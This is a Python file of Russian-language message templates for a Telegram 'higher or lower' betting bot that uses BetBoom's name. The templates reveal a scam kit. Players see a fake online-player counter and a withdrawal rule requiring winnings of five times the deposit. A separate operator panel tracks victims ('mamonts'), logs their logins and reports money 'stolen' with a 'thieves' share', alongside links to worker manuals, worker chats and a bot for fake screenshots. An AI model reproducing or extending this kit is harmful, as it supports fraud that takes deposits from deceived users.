main_menu = '''<b>💼 Личный кабинет</b>
➖➖➖➖➖➖➖➖
💰 <b>Баланс:</b> {balance}₽

👤 <b>Приглашено:</b> {invited}

🔗 <b>Пригласительная ссылка:</b>
https://t.me/BetBoom_Online_Robot?start={user_id}
➖➖➖➖➖➖➖➖
🟢 <b>Игроков в сети:</b> {fake_players}'''


agreement = '''<b>🎉 Привет, {}!</b>

<i>Политика и условия пользования данным ботом:
1. Играя у нас, вы берёте все риски за свои средства на себя.
2. Принимая правила, Вы подтверждаете своё совершеннолетие!
3. Ваш аккаунт может быть забанен в подозрении на мошенничество/обман нашей системы!
4. Мультиаккаунты запрещены!
5. Скрипты, схемы использовать запрещено!
6. Для оформления вывода средств, сумма вашего выигрыша должна быть в 5 раз больше суммы пополнения!
7. При использовании нескольких реквизитов на одном аккаунте,требуется верификация лицевого счета, сопровождающаяся пополнением
8. Если будут выявлены вышеперечисленные случаи, Ваш аккаунт будет заморожен до выяснения обстоятельств!
9. В случае необходимости администрация имеет право запросить у Вас документы, подтверждающие Вашу личность и Ваше совершеннолетие.

Ваша задача - угадать, в каком диапазоне будет располагаться выпадшее число. 
От 0 до 50, либо от 50 до 100, в таком случае Вы получаете удвоение суммы ставки, либо же если Ваше число будет равно 50, то тогда Вы получаете выигрыш равный 10 Вашим ставкам. Но вероятность выпадения данного числа намного ниже.</i>'''

rules_game = '''📝 <b>Правила игры "Больше - Меньше</b>"

Ваша задача - угадать в каком диапазоне будет находится выпадшее число.
При выпадении числа в диапазоне от 0 до 50 либо от 50 до 100, ваш ставка удваивается, при выпадении числа 50 ваша ставка умножается в 10 раз.'''

menu_game = '''🎲 <b>Сейчас выпадет случайное число от 0 до 100</b>

<b>💸 Сумма ставки: {}₽</b>

<b>🕹 Выберите исход события:</b>
« 50 - x2
» 50 - x2
= 50 - x10'''

win_or_lose = '''<b>{}! Выпало число:</b> <i>{}</i>
💵 <b>Ваш баланс:</b> <i>{}₽</i>'''

pay_text = '''<b>💳 Для пополнения баланса бота оплатите счёт по кнопке снизу.

После перевода средства зачисляются автоматически.

⚠️ Ссылка на пополнение действительна в течении 30 минут!</b>'''


menu_worker = '''💸 Заработано с нами: {money_mamonts}₽
🐘 С мамонтов: {money_from_mamonts}₽
👥 С рефералов: {referals_money}₽

🐘 Мамонты: {mamonts}
👥 Рефералы: {referals}'''

mamont_info='''👤 Имя: {name}
💵 Баланс: {balance}₽
👥 Рефералов: {referals_mamont}
🔖 Статус: {status}
👁 Логирование: {log_mamont}'''

mamont_payment_adv = '''💸 Спизжено: {money}₽
🤝 Воровская доля: {stolen_percent}₽ (-{percent}%)
👺 Воркер: <a href="tg://user?id={worker_id}">{worker}</a>
🤓 Лохматый: {mamont}'''

info_text = '''<b>Информация:
<a href='https://t.me/+e29hFzwKm3ZiYjk1'>Мануалы</a> 
<a href='https://t.me/+Iob-GAG2TJEzYTg9'>Чат воркеров</a>
<a href='https://t.me/+VdPIgTKDbthkMDc1'>Выплаты</a>
<a href='https://t.me/+H0888kO2QYo4Y2Q1'>Информация</a>

Скрины для убедительности:
@adskaskkjas_bot</b>'''

mamont_withdraw_ac = '''📤 <b>Мамонт выводит деньги!</b>
🐘 <b>Ник:</b> {mamont}
🔑 <b>Логин:</b> {login}
💰 <b>Сумма вывода:</b> {withdraw}.00₽'''

mamont_win_ac = '''<b>Мамонт {}: {}
Ставка: {}₽
Ставил на: {}

Баланс: {}₽</b>'''
